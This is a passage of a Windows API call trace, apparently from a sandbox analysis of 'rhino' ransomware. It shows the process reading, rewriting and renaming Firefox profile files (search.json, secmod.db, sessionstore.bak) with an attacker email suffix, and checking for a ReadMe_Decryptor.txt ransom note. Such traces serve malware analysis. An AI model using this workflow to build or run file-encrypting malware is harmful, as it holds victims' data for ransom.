returned 0x72b7f8 [0103.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0103.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0103.732] GetLastError () returned 0x0 [0103.732] SetLastError (dwErrCode=0x0) [0103.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x41a6) returned 0x75ef78 [0103.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0103.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0150 [0103.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.732] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0103.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0103.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0103.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0103.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0103.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0048 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b02d8 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0420 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0608 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0420 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x24b08d8 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0608 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b0048 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b08d8 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x24b02d8 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x23b0048 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x763128 [0103.734] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x764668 [0103.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763128 | out: hHeap=0x6d0000) returned 1 [0103.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x766630 [0103.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764668 | out: hHeap=0x6d0000) returned 1 [0103.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x73c0b8 [0103.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x766630 | out: hHeap=0x6d0000) returned 1 [0103.738] WriteFile (in: hFile=0xec, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0x42a3, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0x42a3, lpOverlapped=0x0) returned 1 [0103.744] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0103.744] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x42a3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.744] CloseHandle (hObject=0xec) returned 1 [0103.746] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0103.746] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b02d8 [0103.746] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0103.746] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0103.747] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.747] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0103.747] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0103.747] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0103.747] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0103.747] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0103.747] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0103.747] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0103.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.748] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0103.868] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x4000 [0103.869] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4120, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.869] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.869] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0103.871] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.872] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x4000, lpOverlapped=0x0) returned 1 [0103.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0103.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0103.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0103.873] GetLastError () returned 0x0 [0103.873] SetLastError (dwErrCode=0x0) [0103.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4023) returned 0x75ef78 [0103.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0150 [0103.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.874] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0103.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0103.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0103.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0103.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0103.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0048 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0103.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b02d8 [0103.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0420 [0103.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0608 [0103.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0420 | out: hHeap=0x6d0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x24b08d8 [0103.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0608 | out: hHeap=0x6d0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b0048 [0103.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b08d8 | out: hHeap=0x6d0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x24b02d8 [0103.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x23b0048 [0103.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x762fa8 [0103.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7644e8 [0103.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762fa8 | out: hHeap=0x6d0000) returned 1 [0103.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7664b0 [0103.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7644e8 | out: hHeap=0x6d0000) returned 1 [0103.880] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x73c0b8 [0103.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7664b0 | out: hHeap=0x6d0000) returned 1 [0103.881] WriteFile (in: hFile=0x104, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0x4120, lpOverlapped=0x0) returned 1 [0103.882] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0103.883] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.883] CloseHandle (hObject=0x104) returned 1 [0103.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0103.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b02d8 [0103.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0103.885] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0103.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0103.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0103.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0103.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0103.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0103.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0103.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0103.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0103.887] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x3d6 [0103.887] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4f6, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.887] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.887] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0103.890] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.890] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x3d6, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x3d6, lpOverlapped=0x0) returned 1 [0103.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0103.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0103.891] GetLastError () returned 0x0 [0103.891] SetLastError (dwErrCode=0x0) [0103.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3d6) returned 0x24b0048 [0103.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0428 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0530 [0103.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0428 | out: hHeap=0x6d0000) returned 1 [0103.891] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0103.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0103.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 